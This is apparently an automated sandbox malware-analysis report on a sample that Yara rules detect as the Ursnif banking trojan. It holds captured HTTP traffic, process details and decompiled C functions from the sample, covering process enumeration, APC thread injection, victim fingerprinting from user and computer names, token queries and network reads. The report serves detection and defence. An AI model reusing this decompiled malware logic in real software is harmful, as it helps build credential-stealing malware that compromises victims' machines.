2021-11-24 17:24:26 UTC	1	IN	HTTP/1.1 404 Not Found date: Wed, 24 Nov 2021 17:24:25 GMT p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" cache-control: private x-content-type-options: nosniff content-type: text/html; charset=UTF-8 x-envoy-upstream-service-time: 12 server: ATS Content-Length: 1048 Age: 2 Connection: close Strict-Transport-Security: max-age=31536000 Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p10fa5gpsta9&partner=; X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block
2021-11-24 17:24:26 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 42 3d 30 6b 71 66 68 70 35 67 70 73 74 61 39 26 62 3d 33 26 73 3d 6b 69 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 32 34 20 4e 6f 76 20 32 30 32 32 20 32 33 3a 32 34 3a 32 36 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 35 37 36 30 30 3b 20 44 6f 6d 61 69 6e 3d 2e 79 61 68 6f 6f 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 0d 0a 45 78 70 65 63 74 2d 43 54 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 2c 20 72 65 70 6f 72 74 2d 75 72 69 3d 22 68 74 74 70 3a 2f 2f 63 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2f 63 73 70 3f 73 72 63 3d 79 61 68 6f 6f 63 6f 6d 2d 65 78 70 65 63 74 2d 63 74 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 22 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 Data Ascii: Set-Cookie: B=0kqfhp5gpsta9&b=3&s=ki; Expires=Thu, 24 Nov 2022 23:24:26 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"Referrer-Policy: no-ref
2021-11-24 17:24:26 UTC	3	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 75 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 3f 65 72 72 3d 34 30 34 26 65 72 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 66 6a 64 72 61 77 25 32 66 62 78 4c 31 78 77 6a 79 49 44 46 25 32 66 57 68 6e 72 58 4a 57 6d 7a 32 54 77 6c 38 25 32 66 67 59 38 56 30 6d 6a 38 46 46 41 67 51 44 67 42 61 5f 32 46 72 25 32 66 6a 75 33 59 44 7a 47 48 4a 51 76 4a 79 37 55 6c 25 32 66 57 4e 46 69 70 4a 6b 63 5a 64 6e 63 77 70 6a 25 32 66 79 77 6e 78 75 36 4d 55 78 4f 4e 4b 30 58 76 69 39 66 25 32 66 75 63 45 54 75 49 46 64 6d 25 32 66 77 6f 6b 5a 50 54 39 Data Ascii: <html><meta charset='utf-8'><script>var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz2Twl8%2fgY8V0mj8FFAgQDgBa_2Fr%2fju3YDzGHJQvJy7Ul%2fWNFipJkcZdncwpj%2fywnxu6MUxONK0Xvi9f%2fucETuIFdm%2fwokZPT9

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: R0xLHA2mT5.exe PID: 3608 Parent PID: 4516

General

Start time:	18:23:55
Start date:	24/11/2021
Path:	C:\Users\user\Desktop\R0xLHA2mT5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\R0xLHA2mT5.exe"
Imagebase:	0x400000
File size:	298496 bytes
MD5 hash:	9F3B8462C508884F6966F3AD4A275799
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: R0xLHA2mT5.exe PID: 3608 Parent PID: 4516 R0xLHA2mT5.exeCOMMON

Executed Functions

Function 004019A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004019A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00401752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E004016EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E004017CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E004014AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E004017E0(_t62,  &_v12) != 0) {
					 *0x4030f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E004013C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x4030f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E004016EE(_t69 + _t23);
				 *0x4030f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E004017CB(_t61);
				goto L16;
			}

0x004019a7
0x004019ac
0x004019ae
0x004019b3
0x00401b1b
0x00401b1b
0x004019bb
0x004019bb
0x004019bd
0x004019c0
0x004019c7
0x004019cf
0x004019d3
0x00401a0d
0x004019d5
0x004019df
0x004019e5
0x004019e7
0x004019ec
0x004019f2
0x004019f4
0x004019f4
0x004019fc
0x00401a02
0x00401a02
0x00401a06
0x00401a06
0x00401a14
0x00401a1a
0x00401a23
0x00401a26
0x00401a2c
0x00401a2f
0x00401a36
0x00401b17
0x00000000
0x00401b18
0x00401a47
0x00401a87
0x00401a8d
0x00401a9d
0x00401aa3
0x00401aad
0x00401b08
0x00401b0a
0x00401b0d
0x00401b0d
0x00401b13
0x00401b15
0x00401b15
0x00000000
0x00401b13
0x00401ab9
0x00401ac7
0x00401ac9
0x00401acd
0x00401ad0
0x00401ad7
0x00401adc
0x00401ade
0x00401ade
0x00401ae6
0x00000000
0x00401ae8
0x00401aeb
0x00401af1
0x00401af6
0x00401afd
0x00401afd
0x00401b04
0x00000000
0x00401b04
0x00401ae6
0x00401a49
0x00401a51
0x00401a55
0x00401a57
0x00401a5b
0x00401a7d
0x00401a7d
0x00401a83
0x00401a83
0x00000000
0x00401a83
0x00401a5d
0x00401a62
0x00401a67
0x00401a6e
0x00000000
0x00000000
0x00401a73
0x00401a76
0x00000000

APIs

Part of subcall function 00401752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
Part of subcall function 00401752: GetVersion.KERNEL32 ref: 00401770
Part of subcall function 00401752: GetCurrentProcessId.KERNEL32 ref: 0040178C
Part of subcall function 00401752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

NtQuerySystemInformation.NTDLL ref: 004019DF
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
CreateThread.KERNEL32 ref: 00401A9D
QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9
GetLastError.KERNEL32(?,00000000), ref: 00401AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401AD7
SetLastError.KERNEL32(?,?,00000000), ref: 00401ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00401AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B04
GetLastError.KERNEL32(?,00000000), ref: 00401B08
GetLastError.KERNEL32(?,00000000), ref: 00401B15

Strings

0, xrefs: 004019F4

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction ID: 752d4060508721c6492002363c13e596e1a4780a18635d73c6680d1c48b3a507
Opcode Fuzzy Hash: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
Instruction Fuzzy Hash: 5F417371D01215ABDB11AFE58D88D9F7ABCAF08314B10417BE601F32A0E7789E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B7A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E022B7A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x22bd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E022B4F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x22bd2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x22bd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E022B2C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x22bd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x22bd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E022B2C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x22bd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x022b7a2e
0x022b7a36
0x022b7a3a
0x022b7a3d
0x022b7a42
0x022b7a44
0x022b7a49
0x022b7a49
0x022b7a4f
0x022b7a51
0x022b7a5e
0x022b7abf
0x022b7a60
0x022b7a65
0x022b7a6b
0x022b7a70
0x022b7a7e
0x022b7a82
0x022b7a91
0x022b7a98
0x022b7a9f
0x022b7a9f
0x022b7aaa
0x022b7aaa
0x022b7a82
0x022b7a70
0x022b7ac1
0x022b7ac7
0x022b7ad1
0x022b7ad3
0x022b7ad8
0x022b7ae7
0x022b7aeb
0x022b7af6
0x022b7afd
0x022b7b04
0x022b7b04
0x022b7b10
0x022b7b10
0x022b7aeb
0x022b7b1b
0x022b7b1d
0x022b7b20
0x022b7b22
0x022b7b25
0x022b7b28
0x022b7b32
0x022b7b36
0x022b7b3a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 022B7A65
RtlAllocateHeap.NTDLL(00000000,?), ref: 022B7A7C
GetUserNameW.ADVAPI32(00000000,?), ref: 022B7A89
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,022B30EE), ref: 022B7AAA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 022B7AD1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 022B7AE5
GetComputerNameW.KERNEL32(00000000,00000000), ref: 022B7AF2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,022B30EE), ref: 022B7B10

Strings

Ut, xrefs: 022B7AAA, 022B7B10

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: 1acadd7c968fcdb6d54ba12ecc9a7e87cc8b0c690dc19e64acb5fd640b9ba6cb
Instruction ID: f6901da06307ca440c83e9fe9365ffcc734512e3402118d6a45eb0d445c234dd
Opcode Fuzzy Hash: 1acadd7c968fcdb6d54ba12ecc9a7e87cc8b0c690dc19e64acb5fd640b9ba6cb
Instruction Fuzzy Hash: 99311A72A50206EFDB12DFE5DC84AAEF7F9EF84354F114829E505D7210E770DA519B10

Uniqueness

Uniqueness Score: -1.00%

Function 00401E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403104;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401e22
0x00401e2b
0x00401e2f
0x00401e35
0x00401e3a
0x00401e3f
0x00401e42
0x00401e45
0x00401e4a
0x00401e4b
0x00401e4e
0x00401e59
0x00401e60
0x00401e64
0x00401e66
0x00401e67
0x00401e6a
0x00401e6f
0x00401e79
0x00401e7b
0x00401e7b
0x00401e8f
0x00401e95
0x00401e99
0x00401ee9
0x00401e9b
0x00401ea4
0x00401eba
0x00401ec2
0x00401ed4
0x00401ed8
0x00000000
0x00000000
0x00401ec4
0x00401ec7
0x00401ecc
0x00401ece
0x00401ece
0x00401eaf
0x00401eb1
0x00401eda
0x00401edb
0x00401edb
0x00401ea4
0x00401ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?,?), ref: 00401E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401E45
_snwprintf.NTDLL ref: 00401E6A
CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EA6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A), ref: 00401EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EE3

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction ID: a99f727ced56dbd8a4c2c124101b8a7b9c2e615e3b488e27424ce2f1f10c42e7
Opcode Fuzzy Hash: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction Fuzzy Hash: 2521A1B2900209BFD711AFA4DD88EAF37A9EB48354F114036FB05F72E0D6749905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 022B9A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E022B9A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E022B1525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E022B8B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x022b9a1c
0x022b9a1d
0x022b9a1e
0x022b9a1f
0x022b9a20
0x022b9a24
0x022b9a2b
0x022b9a3a
0x022b9a3d
0x022b9a40
0x022b9a47
0x022b9a4a
0x022b9a4d
0x022b9a50
0x022b9a53
0x022b9a5e
0x022b9a60
0x022b9a69
0x022b9a71
0x022b9a73
0x022b9a85
0x022b9a8f
0x022b9a93
0x022b9aa2
0x022b9aa6
0x022b9aaf
0x022b9ab7
0x022b9ab7
0x022b9ab9
0x022b9ab9
0x022b9ac1
0x022b9ac7
0x022b9acb
0x022b9acb
0x022b9ad6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 022B9A56
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 022B9A69
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022B9A85

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022B9AA2
memcpy.NTDLL(00000000,00000000,0000001C), ref: 022B9AAF
NtClose.NTDLL(?), ref: 022B9AC1
NtClose.NTDLL(00000000), ref: 022B9ACB

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 928e05bfc5c41ef92a8a0a285687ee7bcc89d43119a7bb82e5a63119010a2b74
Instruction ID: f7043e06737cf76301eda72c462e95a830b4cc4fcc627f1f0b78fa83a310215b
Opcode Fuzzy Hash: 928e05bfc5c41ef92a8a0a285687ee7bcc89d43119a7bb82e5a63119010a2b74
Instruction Fuzzy Hash: 532105B2950219BFDB029FE5DC44ADEBFBDEF08780F108422FA05E6110D7719A549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 022B5988, Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E022B5988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x22bd164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E022B1525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E022B29C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E022B8B22(_v16);
										if(_t64 == 0) {
											_t64 = E022B48CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E022B29C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E022B57DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x022b5988
0x022b5989
0x022b598f
0x022b599a
0x022b599a
0x022b599c
0x022ba556
0x022ba55b
0x022ba55d
0x022ba574
0x022ba5a5
0x022ba5aa
0x022ba66d
0x022ba5b0
0x022ba5b7
0x022ba5bf
0x022ba66a
0x022ba5c5
0x022ba5ca
0x022ba5cf
0x022ba5d4
0x022ba65c
0x022ba5da
0x022ba5da
0x022ba5dc
0x022ba5e2
0x022ba5e3
0x022ba5e3
0x022ba5e6
0x022ba5e9
0x022ba5ef
0x022ba600
0x022ba608
0x00000000
0x00000000
0x022ba610
0x022ba618
0x022ba624
0x022ba628
0x022ba62a
0x022ba62f
0x00000000
0x00000000
0x022ba62f
0x022ba628
0x022ba641
0x022ba644
0x022ba64b
0x022ba656
0x022ba656
0x00000000
0x022ba631
0x022ba631
0x022ba636
0x022ba638
0x022ba639
0x022ba63c
0x00000000
0x022ba63c
0x00000000
0x022ba636
0x022ba5e3
0x022ba65d
0x022ba65d
0x022ba663
0x022ba663
0x022ba5bf
0x022ba576
0x022ba57c
0x022ba584
0x022ba59d
0x022ba59f
0x00000000
0x00000000
0x022ba586
0x022ba590
0x022ba594
0x022ba59a
0x00000000
0x022ba59a
0x022ba594
0x022ba584
0x022ba676
0x022b5991
0x022b5991
0x022b5998
0x022b59a3
0x00000000
0x00000000
0x00000000
0x022b5998

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 022BA55D
InternetReadFile.WININET(?,?,00000004,?), ref: 022BA56C
